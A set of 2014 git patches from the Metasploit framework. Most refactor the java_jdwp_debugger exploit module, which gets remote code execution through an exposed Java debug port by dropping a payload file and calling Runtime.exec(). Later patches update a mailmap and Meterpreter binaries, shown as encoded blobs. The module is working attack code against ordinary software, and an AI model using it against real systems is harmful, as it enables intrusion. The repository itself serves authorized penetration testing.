runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "<init>") buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + unless buf[0] == [TAG_OBJECT].pack('C') + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") + end decoder = unformat(size, buf[1..1+size-1]) - fail_with(Failure::Unknown, "Failed to create Base64 decoder object") if decoder.nil? || (decoder == 0) + if decoder.nil? || decoder == 0 + fail_with(Failure::Unknown, "Failed to create Base64 decoder object") + end cmd_obj_ids = create_string("#{Rex::Text.encode_base64(pl_exe)}") - fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 + if cmd_obj_ids.length == 0 + fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") + end cmd_obj_id = cmd_obj_ids[0]["obj_id"] data = [TAG_OBJECT].pack('C') @@ -643,7 +637,9 @@ class Metasploit3 < Msf::Exploit::Remote data_array = [data] runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B") buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray") unless buf[0] == [TAG_ARRAY].pack('C') + unless buf[0] == [TAG_ARRAY].pack('C') + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray") + end pl = unformat(size, buf[1..1+size-1]) pl @@ -657,7 +653,9 @@ class Metasploit3 < Msf::Exploit::Remote data_array = [data] runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "write", "([B)V") buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) - fail_with(Failure::Unknown, "Exception ocurred when writing to file") unless buf[0] == [TAG_VOID].pack('C') + unless buf[0] == [TAG_VOID].pack('C') + fail_with(Failure::Unknown, "Exception while writing to file") + end end # Closes a file on the server given a execution thread @@ -665,7 +663,9 @@ class Metasploit3 < Msf::Exploit::Remote size = @vars["objectid_size"] runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close") buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"]) - fail_with(Failure::Unknown, "Exception ocurred when closing file") unless buf[0] == [TAG_VOID].pack('C') + unless buf[0] == [TAG_VOID].pack('C') + fail_with(Failure::Unknown, "Exception while closing file") + end end # Executes a system command on target VM making use of java.lang.Runtime.exec() @@ -674,27 +674,37 @@ class Metasploit3 < Msf::Exploit::Remote # 1. Creates a string on target VM with the command to be executed cmd_obj_ids = create_string(cmd) - fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") if cmd_obj_ids.length == 0 + if cmd_obj_ids.length == 0 + fail_with(Failure::Unknown, "Failed to allocate string for payload dumping") + end cmd_obj_id = cmd_obj_ids[0]["obj_id"] # 2. Gets Runtime context runtime_class , runtime_meth = get_class_and_method("Ljava/lang/Runtime;", "getRuntime") buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + unless buf[0] == [TAG_OBJECT].pack('C') + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") + end rt = unformat(size, buf[1..1+size-1]) - fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()") if rt.nil? || (rt == 0) + if rt.nil? || (rt == 0) + fail_with(Failure::Unknown, "Failed to invoke Runtime.getRuntime()") + end # 3. Finds and executes "exec" method supplying the string with the command exec_meth = get_method_by_name(runtime_class["reftype_id"], "exec") - fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()") if exec_meth.nil? + if exec_meth.nil? + fail_with(Failure::BadConfig, "Cannot find method Runtime.exec()") + end data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) data_array = [data] buf = invoke(rt, thread_id, runtime_class["reftype_id"], exec_meth["method_id"], data_array) - fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") unless buf[0] == [TAG_OBJECT].pack('C') + unless buf[0] == [TAG_OBJECT].pack('C') + fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") + end end # Sets a breakpoint on frequently called method (user-defined) @@ -704,11 +714,15 @@ class Metasploit3 < Msf::Exploit::Remote # 1. Gets reference of the method where breakpoint is going to be setted classname, method = str2fqclass(datastore['BREAKPOINT']) break_class = get_class_by_name(classname) - fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application") unless break_class + unless break_class + fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application") + end get_methods(break_class["reftype_id"]) m = get_method_by_name(break_class["reftype_id"], method) - fail_with(Failure::BadConfig, "Method of Break Class not found") unless m + unless m + fail_with(Failure::BadConfig, "Method of Break Class not found") + end # 2. Sends event request for this method loc = [TYPE_CLASS].pack('C') @@ -718,7 +732,9 @@ class Metasploit3 < Msf::Exploit::Remote data = [[MODKIND_LOCATIONONLY, loc]] r_id = send_event(EVENT_BREAKPOINT, data) - fail_with(Failure::Unknown, "Could not set the breakpoint") unless r_id + unless r_id + fail_with(Failure::Unknown, "Could not set the breakpoint") + end r_id end From b76253f9ffb0941bfb7135db77e6a42bbe9fc633 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 14:25:01 -0500 Subject: [PATCH 492/853] Add context to the socket --- modules/exploits/multi/misc/java_jdwp_debugger.rb | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index aefb7c55ae..4c3c7a5991 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -450,7 +450,12 @@ class Metasploit3 < Msf::Exploit::Remote rex_socket = Rex::Socket::Tcp.create( 'PeerHost' => rhost, - 'PeerPort' => datastore['BREAKPOINT_PORT'] + 'PeerPort' => datastore['BREAKPOINT_PORT'], + 'Context' => + { + 'Msf' => framework, + 'MsfExploit' => self, + } ) add_socket(rex_socket) From bb77327b09e150020aa493b31a606f075d2864af Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 14:50:18 -0500 Subject: [PATCH 493/853] Warn the user if the detected platform doesnt match target --- .../exploits/multi/misc/java_jdwp_debugger.rb | 61 +++++++++++-------- 1 file changed, 36 insertions(+), 25 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 4c3c7a5991..e1b12bbf70 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -388,19 +388,25 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if specified class and method are currently loaded by the target VM and returns them def get_class_and_method(looked_class, looked_method, signature = nil) target_class = get_class_by_name(looked_class) - fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found") unless target_class + unless target_class + fail_with(Failure::Unknown, "Class \"#{looked_class}\" not found") + end get_methods(target_class["reftype_id"]) target_method = get_method_by_name(target_class["reftype_id"], looked_method, signature) - fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") unless target_method + unless target_method + fail_with(Failure::Unknown, "Method \"#{looked_method}\" not found") + end return target_class, target_method end # Transform string contaning class and method(ie. from "java.net.ServerSocket.accept" to "Ljava/net/Serversocket;" and "accept") - def str2fqclass(s) + def str_to_fq_class(s) i = s.rindex(".") - fail_with(Failure::BadConfig, 'Bad defined break class') unless i + unless i + fail_with(Failure::BadConfig, 'Bad defined break class') + end method = s[i+1..-1] # Subtr of s, from last '.' to the end of the string @@ -416,7 +422,9 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(create_packet(RESUMEVM_SIG)) response = read_reply - fail_with(Exploit::Failure::Unknown, "No network response") unless response + unless response + fail_with(Exploit::Failure::Unknown, "No network response") + end end # Sets an event request. When the event described by this request occurs, an event is sent from the target VM @@ -432,20 +440,14 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(create_packet(EVENTSET_SIG, data)) response = read_reply - fail_with(Exploit::Failure::Unknown, "#{peer} - No network response") unless response + unless response + fail_with(Exploit::Failure::Unknown, "#{peer} - No network response") + end return response.unpack('N')[0] end - # Waits user defined time for an event sent from the target VM (or force event if possible) - def wait_for_event - force_net_event unless datastore['BREAKPOINT_PORT'].nil? || (datastore['BREAKPOINT_PORT'] == 0) - buf = read_reply(datastore['BREAK_TIMEOUT']) - - return buf - end - # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket - def force_net_event + def force_http_event print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") rex_socket = Rex::Socket::Tcp.create( @@ -454,7 +456,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Context' => { 'Msf' => framework, - 'MsfExploit' => self, + 'MsfExploit' => self } ) @@ -492,7 +494,8 @@ class Metasploit3 < Msf::Exploit::Remote end # Invokes a static method. The method must be member of the class type or one of its superclasses, - # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. + # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private + # methods can be invoked. def invoke_static(class_id, thread_id, meth_id, args = []) data = format(@vars["referencetypeid_size"], class_id) data << format(@vars["objectid_size"], thread_id) @@ -510,7 +513,8 @@ class Metasploit3 < Msf::Exploit::Remote end # Invokes a instance method. The method must be member of the object's type or one of its superclasses, - # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods can be invoked. + # superinterfaces, or implemented interfaces. Access control is not enforced; for example, private methods + # can be invoked. def invoke(obj_id, thread_id, class_id, meth_id, args = []) data = format(@vars["objectid_size"], obj_id) data << format(@vars["objectid_size"], thread_id) @@ -528,7 +532,8 @@ class Metasploit3 < Msf::Exploit::Remote buf end - # Creates a new object of specified class, invoking the specified constructor. The constructor method ID must be a member of the class type. + # Creates a new object of specified class, invoking the specified constructor. The constructor + # method ID must be a member of the class type. def create_instance(class_id, thread_id, meth_id, args = []) data = format(@vars["referencetypeid_size"], class_id) data << format(@vars["objectid_size"], thread_id) @@ -564,11 +569,15 @@ class Metasploit3 < Msf::Exploit::Remote when 'linux' path = temp_path || '/tmp/' payload_exe = "#{path}#{payload_exe}" - when 'windows' + if @os.downcase =~ /win/ + print_warning("#{peer} - #{@os} system detected but using Linux target...") + end + when 'win' path = temp_path || './' payload_exe = "#{path}#{payload_exe}.exe" - else - fail_with(Failure::NoTarget, 'Unsupported target platform') + unless @os.downcase =~ /win/ + print_warning("#{peer} - #{@os} system detected but using Windows target...") + end end return payload_exe, pl_exe @@ -665,7 +674,6 @@ class Metasploit3 < Msf::Exploit::Remote # Closes a file on the server given a execution thread def close_file(thread_id, file) - size = @vars["objectid_size"] runtime_class , runtime_meth = get_class_and_method("Ljava/io/FileOutputStream;", "close") buf = invoke(file, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"]) unless buf[0] == [TAG_VOID].pack('C') @@ -717,7 +725,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("#{peer} - Setting breakpoint on class: #{datastore['BREAKPOINT']}") # 1. Gets reference of the method where breakpoint is going to be setted - classname, method = str2fqclass(datastore['BREAKPOINT']) + classname, method = str_to_fq_class(datastore['BREAKPOINT']) break_class = get_class_by_name(classname) unless break_class fail_with(Failure::NotFound, "Could not access #{datastore['BREAKPOINT']}, probably is not used by the application") @@ -809,7 +817,10 @@ class Metasploit3 < Msf::Exploit::Remote ret = "" datastore['NUM_RETRIES'].times do |i| print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...") - buf = wait_for_event + if datastore['BREAKPOINT_PORT'] && datastore['BREAKPOINT_PORT'] > 0 + force_http_event + end + buf = read_reply(secs) ret = parse_event_breakpoint(buf, r_id) break unless ret.nil? end From c9bd0ca9950f3775cefa9ef5a2ea2e4eed6cab06 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 4 Jun 2014 15:56:14 -0500 Subject: [PATCH 494/853] Add minor changes --- modules/exploits/multi/misc/java_jdwp_debugger.rb | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index e1b12bbf70..4d5d43dc96 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -116,13 +116,13 @@ class Metasploit3 < Msf::Exploit::Remote OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]), OptString.new('TMP_PATH', [ false, 'A directory where we can write files. Ensure there is a trailing slash']), OptString.new('BREAKPOINT', [ true, 'Frequently called method for setting breakpoint', 'java.net.ServerSocket.accept' ]), - OptPort.new('BREAKPOINT_PORT', [ false, 'If debugging an application accessible from network and breakpoint is on socket accept, set the port of the app to force a socket connection' ]) + OptPort.new('BREAKPOINT_PORT', [ false, 'HTTP port to trigger breakpoint automatically (Ex. 8080 on tomcat)' ]) ], self.class) register_advanced_options( [ - OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30]), - OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]) + OptInt.new('NUM_RETRIES', [true, 'Number of retries when waiting for event', 10]), + OptInt.new('BREAK_TIMEOUT', [true, 'Number of seconds to wait for a breakpoint hit', 30]) ], self.class) end @@ -210,7 +210,6 @@ class Metasploit3 < Msf::Exploit::Remote ret end - # Pack Fixnum for JDWP protocol def format(fmt, value) if fmt == "L" || fmt == 8 @@ -285,7 +284,6 @@ class Metasploit3 < Msf::Exploit::Remote entries end - # Gets the sizes of variably-sized data types in the target VM def get_sizes formats = [ @@ -301,7 +299,6 @@ class Metasploit3 < Msf::Exploit::Remote entries.each { |e| @vars.merge!(e) } end - # Gets the JDWP version implemented by the target VM def get_version formats = [ @@ -317,12 +314,10 @@ class Metasploit3 < Msf::Exploit::Remote entries.each { |e| @vars.merge!(e) } end - def version "#{@vars["vm_name"]} - #{@vars["vm_version"]}" end - # Returns reference types for all classes currently loaded by the target VM def get_all_classes return unless @classes.empty? From e7957bf9990ca44d5a0ce0301d3319ed9f4a3615 Mon Sep 17 00:00:00 2001 From: Julian Vilas <julian.vilas@gmail.com> Date: Thu, 5 Jun 2014 01:33:00 +0200 Subject: [PATCH 495/853] Change GET request by random text --- modules/exploits/multi/misc/java_jdwp_debugger.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 4d5d43dc96..73e838bfc0 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -442,7 +442,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Force a network event for hitting breakpoint when object of debugging is a network app and break class is socket - def force_http_event + def force_net_event print_status("#{peer} - Forcing network event over #{datastore['BREAKPOINT_PORT']}") rex_socket = Rex::Socket::Tcp.create( @@ -457,7 +457,7 @@ class Metasploit3 < Msf::Exploit::Remote add_socket(rex_socket) - rex_socket.put("GET / HTTP/1.0\r\n\r\n") + rex_socket.put(rand_text_alphanumeric(4 + rand(4))) begin rex_socket.shutdown @@ -813,7 +813,7 @@ class Metasploit3 < Msf::Exploit::Remote datastore['NUM_RETRIES'].times do |i| print_status("#{peer} - Waiting for breakpoint hit #{i} during #{secs} seconds...") if datastore['BREAKPOINT_PORT'] && datastore['BREAKPOINT_PORT'] > 0 - force_http_event + force_net_event end buf = read_reply(secs) ret = parse_event_breakpoint(buf, r_id) From 8747273b0188cd4b44dc49df37013429f2b28906 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Thu, 5 Jun 2014 10:40:38 -0500 Subject: [PATCH 496/853] Add @trosen-r7's alias for commits Just so quick counts of contributors is slightly more accurate and @trosen-r7 doesn't accidentally get double counted. --- .mailmap | 1 + 1 file changed, 1 insertion(+) diff --git a/.mailmap b/.mailmap index 713206e261..79a858c2a7 100644 --- a/.mailmap +++ b/.mailmap @@ -18,6 +18,7 @@ todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com> todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com> todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com> trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com> +trosen-r7 <trosen-r7@github> Trevor Rosen <trevor@catapult-creative.com> wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com> wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com> From 737f06f60000d857e075d46e45dcbe1e85e6c606 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Thu, 5 Jun 2014 17:17:32 -0500 Subject: [PATCH 497/853] Add Meterpreter bins for release branch. This contains the same bins as #3423, but it is targeted at the release branch for rapid7/metasploit-framework. --- data/meterpreter/common.lib | Bin 576388 -> 577224 bytes data/meterpreter/elevator.x64.dll | Bin 90624 -> 90624 bytes data/meterpreter/elevator.x86.dll | Bin 78336 -> 78336 bytes data/meterpreter/ext_server_espia.x64.dll | Bin 203776 -> 203776 bytes data/meterpreter/ext_server_espia.x86.dll | Bin 203264 -> 203264 bytes data/meterpreter/ext_server_extapi.x64.dll | Bin 147968 -> 147456 bytes data/meterpreter/ext_server_extapi.x86.dll | Bin 124416 -> 124416 bytes data/meterpreter/ext_server_incognito.x64.dll | Bin 106496 -> 106496 bytes data/meterpreter/ext_server_incognito.x86.dll | Bin 98816 -> 98816 bytes data/meterpreter/ext_server_kiwi.x64.dll | Bin 284160 -> 284160 bytes data/meterpreter/ext_server_kiwi.x86.dll | Bin 245760 -> 245760 bytes .../meterpreter/ext_server_lanattacks.x64.dll | Bin 227840 -> 227840 bytes .../meterpreter/ext_server_lanattacks.x86.dll | Bin 180736 -> 180736 bytes data/meterpreter/ext_server_mimikatz.x64.dll | Bin 541696 -> 541696 bytes data/meterpreter/ext_server_mimikatz.x86.dll | Bin 406528 -> 406528 bytes data/meterpreter/ext_server_priv.x64.dll | Bin 135168 -> 135168 bytes data/meterpreter/ext_server_priv.x86.dll | Bin 114176 -> 114176 bytes data/meterpreter/ext_server_stdapi.jar | Bin 38782 -> 38782 bytes data/meterpreter/ext_server_stdapi.py | 121 ++++++++---- data/meterpreter/ext_server_stdapi.x64.dll | Bin 411648 -> 411648 bytes data/meterpreter/ext_server_stdapi.x86.dll | Bin 377344 -> 377344 bytes data/meterpreter/meterpreter.jar | Bin 24427 -> 24427 bytes data/meterpreter/meterpreter.py | 184 +++++++++++------- data/meterpreter/metsrv.x64.dll | Bin 972800 -> 972800 bytes data/meterpreter/metsrv.x86.dll | Bin 770048 -> 770048 bytes data/meterpreter/screenshot.x64.dll | Bin 202752 -> 202752 bytes data/meterpreter/screenshot.x86.dll | Bin 202752 -> 202752 bytes 27 files changed, 194 insertions(+), 111 deletions(-) diff --git a/data/meterpreter/common.lib b/data/meterpreter/common.lib index dc6eda39745b333bf6107c17bae35293514b2ce4..17f9de46f01db9bc9b5ffd39b1aea7d5cfbc0d40 100755 GIT binary patch delta 35638 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 